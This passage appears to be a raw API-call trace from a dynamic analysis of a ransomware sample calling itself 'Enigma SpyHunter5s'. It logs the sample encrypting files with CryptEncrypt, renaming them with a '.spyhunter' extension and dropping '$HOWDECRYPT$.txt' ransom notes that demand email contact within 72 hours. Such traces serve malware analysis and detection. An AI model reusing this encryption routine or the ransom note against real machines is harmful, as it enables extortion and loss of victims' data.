(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.211] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe68*=0x2ac, lpOverlapped=0x0) returned 1 [0087.211] CloseHandle (hObject=0x15c) returned 1 [0087.211] GetProcessHeap () returned 0x2c0000 [0087.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354620 | out: hHeap=0x2c0000) returned 1 [0087.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe08 | out: pbBuffer=0x270fe08) returned 1 [0087.211] GetProcessHeap () returned 0x2c0000 [0087.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x270fe00*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x270fe00*=0x30) returned 1 [0087.211] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.324] GetProcessHeap () returned 0x2c0000 [0087.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.324] GetProcessHeap () returned 0x2c0000 [0087.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372870 | out: hHeap=0x2c0000) returned 1 [0087.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0087.324] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.324] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd37*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe60, lpOverlapped=0x0 | out: lpBuffer=0x270fd37*, lpNumberOfBytesWritten=0x270fe60*=0x127, lpOverlapped=0x0) returned 1 [0087.328] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.328] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe60, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe60*=0x2ac, lpOverlapped=0x0) returned 1 [0087.328] CloseHandle (hObject=0xcc) returned 1 [0087.352] GetProcessHeap () returned 0x2c0000 [0087.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3744d0 | out: hHeap=0x2c0000) returned 1 [0087.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fe00 | out: pbBuffer=0x270fe00) returned 1 [0087.353] GetProcessHeap () returned 0x2c0000 [0087.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdf8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdf8*=0x30) returned 1 [0087.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.354] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0087.354] StrStrW (lpFirst="ACEINTL.DLL", lpSrch=".txt") returned 0x0 [0087.354] GetProcessHeap () returned 0x2c0000 [0087.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.354] ReadFile (in: hFile=0x16c, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fdbc, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x270fdbc*=0x2800, lpOverlapped=0x0) returned 1 [0087.378] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.379] WriteFile (in: hFile=0x16c, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fdbc, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x270fdbc*=0x2800, lpOverlapped=0x0) returned 1 [0087.379] GetProcessHeap () returned 0x2c0000 [0087.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.379] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.379] WriteFile (in: hFile=0x16c, lpBuffer=0x270fdfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fdbc, lpOverlapped=0x0 | out: lpBuffer=0x270fdfc*, lpNumberOfBytesWritten=0x270fdbc*=0x4, lpOverlapped=0x0) returned 1 [0087.386] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fdbc, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fdbc*=0x30, lpOverlapped=0x0) returned 1 [0087.386] CloseHandle (hObject=0x16c) returned 1 [0087.399] GetProcessHeap () returned 0x2c0000 [0087.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3872b8 [0087.399] wnsprintfW (in: pszDest=0x3872b8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.spyhunter") returned 86 [0087.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.spyhunter")) returned 1 [0087.400] GetProcessHeap () returned 0x2c0000 [0087.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3872b8 | out: hHeap=0x2c0000) returned 1 [0087.400] GetProcessHeap () returned 0x2c0000 [0087.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.400] GetProcessHeap () returned 0x2c0000 [0087.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374300 | out: hHeap=0x2c0000) returned 1 [0087.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.400] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.400] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe58, lpOverlapped=0x0 | out: lpBuffer=0x270fd2f*, lpNumberOfBytesWritten=0x270fe58*=0x127, lpOverlapped=0x0) returned 1 [0087.401] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.401] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe58*=0x2ac, lpOverlapped=0x0) returned 1 [0087.401] CloseHandle (hObject=0x16c) returned 1 [0087.402] GetProcessHeap () returned 0x2c0000 [0087.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373098 | out: hHeap=0x2c0000) returned 1 [0087.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdf8 | out: pbBuffer=0x270fdf8) returned 1 [0087.402] GetProcessHeap () returned 0x2c0000 [0087.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdf0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdf0*=0x30) returned 1 [0087.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.402] GetProcessHeap () returned 0x2c0000 [0087.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.402] GetProcessHeap () returned 0x2c0000 [0087.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372fb0 | out: hHeap=0x2c0000) returned 1 [0087.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.406] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.406] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe50, lpOverlapped=0x0 | out: lpBuffer=0x270fd27*, lpNumberOfBytesWritten=0x270fe50*=0x127, lpOverlapped=0x0) returned 1 [0087.407] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.407] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe50*=0x2ac, lpOverlapped=0x0) returned 1 [0087.407] CloseHandle (hObject=0x16c) returned 1 [0087.407] GetProcessHeap () returned 0x2c0000 [0087.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373350 | out: hHeap=0x2c0000) returned 1 [0087.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdf0 | out: pbBuffer=0x270fdf0) returned 1 [0087.407] GetProcessHeap () returned 0x2c0000 [0087.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fde8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fde8*=0x30) returned 1 [0087.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.408] GetProcessHeap () returned 0x2c0000 [0087.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.408] GetProcessHeap () returned 0x2c0000 [0087.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373180 | out: hHeap=0x2c0000) returned 1 [0087.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.408] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.408] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe48, lpOverlapped=0x0 | out: lpBuffer=0x270fd1f*, lpNumberOfBytesWritten=0x270fe48*=0x127, lpOverlapped=0x0) returned 1 [0087.409] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.409] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe48*=0x2ac, lpOverlapped=0x0) returned 1 [0087.409] CloseHandle (hObject=0x16c) returned 1 [0087.409] GetProcessHeap () returned 0x2c0000 [0087.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372ec8 | out: hHeap=0x2c0000) returned 1 [0087.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fde8 | out: pbBuffer=0x270fde8) returned 1 [0087.410] GetProcessHeap () returned 0x2c0000 [0087.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.410] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fde0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fde0*=0x30) returned 1 [0087.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.410] GetProcessHeap () returned 0x2c0000 [0087.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.410] GetProcessHeap () returned 0x2c0000 [0087.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372de0 | out: hHeap=0x2c0000) returned 1 [0087.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.413] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.413] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe40, lpOverlapped=0x0 | out: lpBuffer=0x270fd17*, lpNumberOfBytesWritten=0x270fe40*=0x127, lpOverlapped=0x0) returned 1 [0087.414] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.414] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe40*=0x2ac, lpOverlapped=0x0) returned 1 [0087.415] CloseHandle (hObject=0x16c) returned 1 [0087.415] GetProcessHeap () returned 0x2c0000 [0087.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372cf8 | out: hHeap=0x2c0000) returned 1 [0087.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fde0 | out: pbBuffer=0x270fde0) returned 1 [0087.415] GetProcessHeap () returned 0x2c0000 [0087.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdd8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdd8*=0x30) returned 1 [0087.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.415] GetProcessHeap () returned 0x2c0000 [0087.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.415] GetProcessHeap () returned 0x2c0000 [0087.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372c10 | out: hHeap=0x2c0000) returned 1 [0087.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.415] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.416] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe38, lpOverlapped=0x0 | out: lpBuffer=0x270fd0f*, lpNumberOfBytesWritten=0x270fe38*=0x127, lpOverlapped=0x0) returned 1 [0087.417] lstrlenA 